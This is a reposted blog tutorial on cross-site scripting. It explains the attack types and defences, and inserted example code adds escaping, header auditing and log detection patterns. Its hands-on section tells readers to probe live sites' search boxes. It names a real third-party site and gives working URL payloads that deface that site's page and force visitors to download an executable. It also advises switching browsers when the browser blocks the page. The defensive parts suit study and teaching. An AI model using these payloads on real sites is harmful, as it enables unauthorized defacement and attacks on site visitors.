[Repost] Common web attacks: XSS explained, with a hands-on walkthrough

1 What is XSS?

XSS (Cross-Site Scripting) is a code injection attack: the attacker injects a malicious script into the target site so that it runs in the user's browser. With such a script the attacker can obtain the user's privileges and sensitive information such as cookies and session IDs, endangering data security.

1.1 By the source of the injected code, XSS attacks fall into three categories:

1. Stored XSS

  • Attack steps: the attacker submits malicious code to the target site's database. When a user opens the site, the server reads the malicious code from the database, splices it into the HTML and returns it to the browser. The user's browser receives the response, parses it and executes the malicious code embedded in it. The malicious code steals the user's data and sends it to the attacker's site, or impersonates the user and calls the target site's interfaces to perform arbitrary actions.
  • Commonly found in features that save user-submitted data, such as forum posts, product reviews, private messages, and so on.

2. Reflected XSS

  • Attack steps: the attacker constructs a special URL that contains malicious code. When a user opens it, the server reads the malicious code out of the URL, splices it into the HTML and returns it to the browser. The user's browser receives the response, parses it and executes the malicious code embedded in it. The malicious code steals the user's data and sends it to the attacker's site, or impersonates the user and calls the target site's interfaces to perform arbitrary actions.
  • Commonly found in features that take parameters from the URL, such as site search and redirects. Because the attack only works when the user actively opens the malicious URL, attackers usually combine it with other means to induce the user to click.
  • The difference between reflected and stored XSS: in stored XSS the malicious code lives in the database, in reflected XSS it lives in the URL.

3. DOM-based XSS

  • Attack steps: the attacker constructs a special URL that contains malicious code. The user opens it; the browser receives the response, parses and executes it, and the page's front-end JavaScript reads the malicious code from the URL and executes it. The malicious code steals the user's data and sends it to the attacker's site, or impersonates the user and calls the target site's interfaces to perform arbitrary actions.
  • How DOM-based XSS differs from the other two: in a DOM-based attack, extracting and executing the malicious code is done entirely by the browser, so it is a security flaw in the front-end JavaScript itself, whereas the other two are security flaws on the server side.

2 Preventing XSS attacks

Two goals: prevent malicious code from being implanted into the HTML, and prevent malicious code from being executed as JavaScript.

1. Preventing stored and reflected XSS attacks:

  • Switch to pure front-end rendering, so that code and data are separated.
  • HTML-escape all untrusted output thoroughly.
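The reflected pattern from section 1 and the "escape all HTML output" fix above, as an added example that is not code from the original post. The handler names, the search-result template and the example.invalid host are assumptions made for this illustration; the probe string is the one the post types into the search box.

```javascript
// Added example, not code from the original post: a minimal search-page
// renderer showing the reflected/stored XSS pattern and its escaping fix.
// Function names and the example.invalid host are assumptions.

// Escape the characters that can change meaning inside HTML text or a
// double/single-quoted attribute value. '&' is handled first so that the
// entities produced by later replacements are not escaped again.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Read the keyword parameter from a request URL the way a search handler
// would. URLSearchParams percent-decodes the value for us.
function keywordFromUrl(requestUrl) {
  const url = new URL(requestUrl, 'http://example.invalid');
  return url.searchParams.get('keyword') || '';
}

// Vulnerable pattern: the untrusted keyword is spliced straight into the
// page, so a value containing <script> becomes executable markup.
function renderSearchVulnerable(keyword) {
  return `<h1>Search results for: ${keyword}</h1>`;
}

// Hardened pattern: the same page, with the value escaped at the point it
// enters HTML text. The browser shows the literal characters instead.
function renderSearchSafe(keyword) {
  return `<h1>Search results for: ${escapeHtml(keyword)}</h1>`;
}

// Reviewer's check on rendered output: the template contains no <script>
// tag, so any <script in the result must have come from user data.
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Constructed sample request using the same probe the post types into the
// search box.
const SAMPLE_REQUEST =
  '/search?keyword=' + encodeURIComponent("<script>alert('x');</script>");

const keyword = keywordFromUrl(SAMPLE_REQUEST);
console.log('vulnerable:', renderSearchVulnerable(keyword));
console.log('hardened  :', renderSearchSafe(keyword));
```

The escaper is correct for HTML text and quoted attribute values only; a value placed inside a script block, a URL or a CSS rule needs that context's own encoding instead. The same principle applies on the client side: write untrusted data through a text sink such as textContent rather than an HTML sink.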

2. Preventing DOM-based XSS attacks:

  • Be especially careful with .innerHTML, .outerHTML and document.write(): never insert untrusted data into the page as HTML; use .textContent, .setAttribute() and similar APIs instead.
  • If you use the Vue / React stack and do not use v-html / dangerouslySetInnerHTML, the front end is not rendered through innerHTML / outerHTML and the XSS hazard at the rendering stage is avoided.

3. Other XSS defences:

  • Content Security Policy (CSP)
  • Limit the length of input, which raises the difficulty of an XSS attack.
  • HttpOnly cookies: forbid JavaScript from reading sensitive cookies, so that even after injecting XSS the attacker cannot steal them.
  • Verification codes (CAPTCHA): prevent a script from impersonating the user to submit dangerous operations.
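Two of the defences just listed, CSP and HttpOnly cookies, can be checked on a response's headers. The following is an added example, not code from the original post: it parses the two headers and reports whether an injected inline script could still run and whether the session cookie is readable from JavaScript. The header values, cookie names and the set of "sensitive" cookies are constructed for this illustration.

```javascript
// Added example, not code from the original post: header checks for the
// CSP and HttpOnly-cookie mitigations, run over constructed responses.

// Parse a Content-Security-Policy value into a Map of directive -> sources.
function parseCsp(header) {
  const directives = new Map();
  for (const part of header.split(';')) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    const [name, ...sources] = tokens;
    directives.set(name.toLowerCase(), sources.map((s) => s.toLowerCase()));
  }
  return directives;
}

// Would this policy let an injected inline <script> run? Scripts are
// governed by script-src, falling back to default-src. No policy, no
// applicable directive, or 'unsafe-inline' all mean yes, except that browsers
// ignore 'unsafe-inline' once a nonce or hash source is present.
function cspAllowsInlineScript(header) {
  if (!header) return true;
  const csp = parseCsp(header);
  const effective = csp.get('script-src') || csp.get('default-src');
  if (!effective) return true;
  const hasNonceOrHash = effective.some((s) => /^'(nonce-|sha(256|384|512)-)/.test(s));
  return effective.includes("'unsafe-inline'") && !hasNonceOrHash;
}

// Parse a Set-Cookie value into its name and a lowercase attribute set.
function parseSetCookie(header) {
  const [pair, ...attrs] = header.split(';').map((s) => s.trim());
  const name = pair.slice(0, pair.indexOf('='));
  const attributes = new Set(attrs.map((a) => a.split('=')[0].toLowerCase()));
  return { name, attributes };
}

function cookieIsHttpOnly(header) {
  return parseSetCookie(header).attributes.has('httponly');
}

// Audit a response's headers and return a list of findings (empty = OK).
// `headers` is a plain object keyed by lowercase header name; set-cookie may
// be a string or an array, as Node's http module presents it. Which cookies
// count as sensitive is an assumption; 'sessionid' is a constructed name.
function auditHeaders(headers, sensitiveCookies = ['sessionid']) {
  const findings = [];
  if (cspAllowsInlineScript(headers['content-security-policy'])) {
    findings.push('CSP allows inline scripts');
  }
  for (const cookie of [].concat(headers['set-cookie'] || [])) {
    const { name, attributes } = parseSetCookie(cookie);
    if (sensitiveCookies.includes(name) && !attributes.has('httponly')) {
      findings.push(`cookie ${name} lacks HttpOnly`);
    }
  }
  return findings;
}

// Constructed responses: one with the weak settings, one hardened.
const WEAK_RESPONSE_HEADERS = {
  'content-security-policy': "default-src 'self'; script-src 'self' 'unsafe-inline'",
  'set-cookie': ['sessionid=abc123; Path=/', 'theme=dark; Path=/'],
};
const HARDENED_RESPONSE_HEADERS = {
  'content-security-policy': "default-src 'self'; script-src 'self'; object-src 'none'",
  'set-cookie': ['sessionid=abc123; Path=/; HttpOnly; Secure; SameSite=Lax'],
};

console.log('weak    :', auditHeaders(WEAK_RESPONSE_HEADERS));
console.log('hardened:', auditHeaders(HARDENED_RESPONSE_HEADERS));
```

The CSP check only answers the inline-script question; a policy that allows inline scripts is what lets the `<script>` payloads shown later on this page execute, while a strict script-src still has to be combined with output escaping, because CSP limits the damage rather than removing the injection.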

3 Practical process

3.1 Finding a site with an XSS vulnerability

Find a site with a search box. Here "pencarian" is Indonesian for "Search".

3.2 Testing the candidate sites one by one

Take one of the test sites and enter <h1>TEST</h1> in the search box. If the site is attackable, a page like the following is displayed.

This means the server splices the parameter straight into the HTML without filtering. Confirm it by right-clicking and viewing the page source.

If the source shows <h1>TEST</h1>, the server performs no filtering at all.

Next, go back and enter <script>alert('x');</script> in the search box. If the site is attackable, the following page appears.


3.3 Injecting a script through the URL (practice 1)

Change the URL to

https://www.sankelux.co.id/search?keyword=<script>document.body.innerHTML="<div style:visibility:visible;><h1>THE SITE WAS HACKED</h1></div>"</script>

That is, the keyword parameter is written as a piece of script code. The result is as follows.

3.4 Injecting a script through the URL (practice 2)

Change the URL to

https://www.sankelux.co.id/search?keyword=<script>document.location="http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe";</script>

The effect is that the putty.exe file is downloaded automatically.

The keyword can be replaced with any script you want to execute.
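Both practice steps above put script markup into a URL query parameter, which means the attempt is recorded in the web server's access log. The following is an added example, not code from the original post: a small detector that scans Common Log Format lines for parameters carrying script or HTML markup, decoding them as the server would. The log lines, IPs and paths are constructed for this illustration; the two probe values are the ones the post types into the search box.

```javascript
// Added example, not code from the original post: scan access-log lines for
// query parameters carrying script or HTML markup. All log data is
// constructed; IPs, paths and timestamps are placeholders.

// Constructed Common Log Format lines. Two carry the probes the post uses.
const SAMPLE_LOG = [
  '203.0.113.5 - - [10/Dec/2019:10:00:01 +0000] "GET /search?keyword=putty HTTP/1.1" 200 5120',
  '203.0.113.7 - - [10/Dec/2019:10:00:02 +0000] "GET /search?keyword=%3Cscript%3Ealert(%27x%27)%3B%3C/script%3E HTTP/1.1" 200 5211',
  '203.0.113.9 - - [10/Dec/2019:10:00:03 +0000] "GET /search?keyword=%3Ch1%3ETEST%3C/h1%3E HTTP/1.1" 200 5190',
  '203.0.113.7 - - [10/Dec/2019:10:00:04 +0000] "GET /products?id=42 HTTP/1.1" 200 8000',
];

// Ordered from most to least specific: things that execute, then tags that
// merely inject markup (a common first probe, as in section 3.2).
const RULES = [
  { category: 'script', pattern: /<\s*script\b|\bon\w+\s*=|javascript\s*:/i },
  { category: 'markup', pattern: /<\s*\/?[a-z][a-z0-9]*\b/i },
];

// Pull the client IP, method, path and raw query out of one log line.
function parseLogLine(line) {
  const m = line.match(/^(\S+) .*"([A-Z]+) (\S+) HTTP\/[\d.]+"/);
  if (!m) return null;
  const target = m[3];
  const q = target.indexOf('?');
  const path = q < 0 ? target : target.slice(0, q);
  const query = q < 0 ? '' : target.slice(q + 1);
  return { ip: m[1], method: m[2], path, query };
}

// Decode parameters. URLSearchParams decodes once; a second pass catches
// double-encoded values (%253C -> %3C -> <). Invalid escapes are kept raw.
function decodedParams(query) {
  const params = [];
  for (const [name, value] of new URLSearchParams(query)) {
    let decoded = value;
    try { decoded = decodeURIComponent(value); } catch (e) { /* keep raw */ }
    params.push({ name, value: decoded });
  }
  return params;
}

// First matching rule wins; null means nothing suspicious.
function classifyValue(value) {
  const hit = RULES.find((r) => r.pattern.test(value));
  return hit ? hit.category : null;
}

// Scan lines and return one finding per suspicious parameter.
function scanLog(lines) {
  const findings = [];
  for (const line of lines) {
    const req = parseLogLine(line);
    if (!req) continue;
    for (const { name, value } of decodedParams(req.query)) {
      const category = classifyValue(value);
      if (category) findings.push({ ip: req.ip, path: req.path, param: name, category, value });
    }
  }
  return findings;
}

for (const f of scanLog(SAMPLE_LOG)) {
  console.log(`${f.category.padEnd(6)} ${f.ip} ${f.path}?${f.param}=${JSON.stringify(f.value)}`);
}
```

This is a coarse triage filter, not a verdict: a legitimate search for "a<b" trips the markup rule, and payloads carried in the URL fragment (after #) never reach the server, so DOM-based attempts leave no trace here. Its value is in spotting the reflected probes quickly and in confirming, after output escaping is in place, that such requests now return harmless pages.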

3.5 Possible problems

The browser blocks the page, as shown below. Switching to a different browser is enough.


Source: www.cnblogs.com/chaos-li/p/12068361.html